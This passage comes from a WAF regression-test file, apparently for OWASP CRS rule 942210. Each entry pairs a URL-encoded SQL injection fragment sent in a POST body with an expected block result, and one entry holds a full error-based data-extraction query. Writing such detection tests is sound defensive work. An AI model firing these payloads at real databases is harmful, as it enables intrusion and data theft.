"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3Ddiv+id%3D%22" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3Ddiv+id%3D%22" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3Ddiv+style%3D%22" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3Ddiv+style%3D%22" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3Dor+1%3D%27" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3Dor+1%3D%27" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3DAND+7829%3D%28" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3DAND+7829%3D%28" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 16, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3DAND+4372%3D%28" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3DAND+4372%3D%28" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%3B+UpdateUserTypeTracking" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%3B+UpdateUserTypeTracking" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 18, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3DoR+pmw%3D%3D" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3DoR+pmw%3D%3D" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 19, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%7C%7C+langCode+%3D%3D+%27" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%7C%7C+langCode+%3D%3D+%27" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 20, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%7C%7C+c+%3D%3D+%27" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%7C%7C+c+%3D%3D+%27" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 21, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%7C%7C+arg+%3D%3D+%27" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%7C%7C+arg+%3D%3D+%27" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 22, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%2FHmong_language+AND+" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%2FHmong_language+AND+" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 23, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%7C%7C+langCode+%3D%3D" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%7C%7C+langCode+%3D%3D" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 24, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%7C%7C+checker+%3D%3D" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%7C%7C+checker+%3D%3D" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 25, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%26%26+setPath+%21%3D" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%26%26+setPath+%21%3D" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 26, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%3Bset+%40" }, "expected": { "should_block": false, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%3Bset+%40" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 27, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%3Bupdate+users" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%3Bupdate+users" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 28, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3Dand+1%3D%28" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3Dand+1%3D%28" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 29, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%2FSPZwOaVcDWkrRly2aV01662fN+Or+" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%2FSPZwOaVcDWkrRly2aV01662fN+Or+" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 30, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3DOR+CType%3D%27" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3DOR+CType%3D%27" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 31, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D1+OR+2%2B" }, "expected": { "should_block": false, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D1+OR+2%2B" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 32, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%3ESET+%40OLD_SQL_NOTES" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%3ESET+%40OLD_SQL_NOTES" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 33, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%3BSET+%40OLD_SQL_MODE" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%3BSET+%40OLD_SQL_MODE" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 34, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%3BSET+%40OLD_FOREIGN_KEY_CHECKS" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%3BSET+%40OLD_FOREIGN_KEY_CHECKS" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 35, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%3BSET+%40OLD_UNIQUE_CHECKS" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%3BSET+%40OLD_UNIQUE_CHECKS" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 36, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%3Bdrop" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%3Bdrop" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 37, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D+SET+%40OLD_SQL_NOTES" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D+SET+%40OLD_SQL_NOTES" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 38, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%40example.com%26name%3D%28select" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%40example.com%26name%3D%28select" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 39, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%40extension%5D%3DMmcDirectmailSubscription%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5B%40vendor%5D%3D%28SELECT" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%40extension%5D%3DMmcDirectmailSubscription%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5B%40vendor%5D%3D%28SELECT" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 40, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%40extension%5D%3DMmcDirectmailSubscription%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5B%40vendor%5D%3DMMC%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5B%40controller%5D%3DSubscribe%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5B%40action%5D%3Dregister%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5Barguments%5D%3DYTowOnt98f5f75937bad1b56b6c736ef42e625647dab347d%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5B%40request%5D%3Da%3A4%3A%7Bs%3A10%3A%26tx_mmcdirectmailsubscription_subscr%5B__trustedProperties%5D%3Da%3A4%3A%7Bs%3A7%3A%26tx_mmcdirectmailsubscription_subscr%5Baddress%5D%5BfirstName%5D%3D%28SELECT" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%40extension%5D%3DMmcDirectmailSubscription%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5B%40vendor%5D%3DMMC%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5B%40controller%5D%3DSubscribe%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5B%40action%5D%3Dregister%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5Barguments%5D%3DYTowOnt98f5f75937bad1b56b6c736ef42e625647dab347d%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5B%40request%5D%3Da%3A4%3A%7Bs%3A10%3A%26tx_mmcdirectmailsubscription_subscr%5B__trustedProperties%5D%3Da%3A4%3A%7Bs%3A7%3A%26tx_mmcdirectmailsubscription_subscr%5Baddress%5D%5BfirstName%5D%3D%28SELECT" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 41, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3Dand+object_type+%3D+%27" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3Dand+object_type+%3D+%27" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 42, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%2FBusiness+and" }, "expected": { "should_block": false, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%2FBusiness+and" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 43, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3DAND+value+%3D+%27" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3DAND+value+%3D+%27" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 44, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D4AND4%2B" }, "expected": { "should_block": false, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D4AND4%2B" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 45, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%2F3+or+" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%2F3+or+" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 46, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%2F3+and%28" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%2F3+and%28" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 47, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%2Fxxxx_R+AND+" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%2Fxxxx_R+AND+" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 48, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%2Fxxxx_R+or" }, "expected": { "should_block": false, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%2Fxxxx_R+or" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 49, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D1+GROUP+BY+CONCAT%280x716a787671%2C%28SELECT+MID%28%28IFNULL%28CAST%28a_1_18+AS+CHAR%29%2C0x20%29%29%2C1%2C54%29+FROM+db_justiz_daz.ugesundheit_antworten+ORDER+BY+id+LIMIT+571%2C1%29%2C0x7178716b71%2CFLOOR%28RAND%280%29%2A2%29%29+HAVING+MIN%28" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D1+GROUP+BY+CONCAT%280x716a787671%2C%28SELECT+MID%28%28IFNULL%28CAST%28a_1_18+AS+CHAR%29%2C0x20%29%29%2C1%2C54%29+FROM+db_justiz_daz.ugesundheit_antworten+ORDER+BY+id+LIMIT+571%2C1%29%2C0x7178716b71%2CFLOOR%28RAND%280%29%2A2%29%29+HAVING+MIN%28" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 50, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3DAND+backend_layout%21%3D" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3DAND+backend_layout%21%3D" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 51, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3DAND+uid%21%3D%28" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3DAND+uid%21%3D%28" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 52, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3Dand+1%3D1%27" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3Dand+1%3D1%27" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 53, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%26%26%28l%3D%210%29" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%26%26%28l%3D%210%29" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 54, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%7C%7C%28e+%3D%22" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%7C%7C%28e+%3D%22" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 55, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%26%26%28e%3D%3D%3D" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%26%26%28e%3D%3D%3D" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 56, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%26%26%28null%3D%3D%28" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%26%26%28null%3D%3D%28" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 57, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%26%26%28a%3D%22" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%26%26%28a%3D%22" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 58, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%7C%7C%28c%3D%211%29" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%7C%7C%28c%3D%211%29" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 59, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%26%26%28d%21%3D%3D" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%26%26%28d%21%3D%3D" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 60, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%7C%7C%28g%3D%210%29" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%7C%7C%28g%3D%210%29" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 61, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%26%26%28e%3D%22" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%26%26%28e%3D%22" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 62, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%26%26%28c%3D%210%29" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%26%26%28c%3D%210%29" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 63, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%26%26%28f+%3D%28" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%26%26%28f+%3D%28" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 64, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%7C%7C%28x%3D%22" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%7C%7C%28x%3D%22" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 65, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%26%26%28b%3D0%29" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%26%26%28b%3D0%29" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 66, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%7C%7C%28e%3D%3D%3D" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%7C%7C%28e%3D%3D%3D" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 67, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%7C%7C%28c%3D%3D%3D" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%7C%7C%28c%3D%3D%3D" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 68, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": 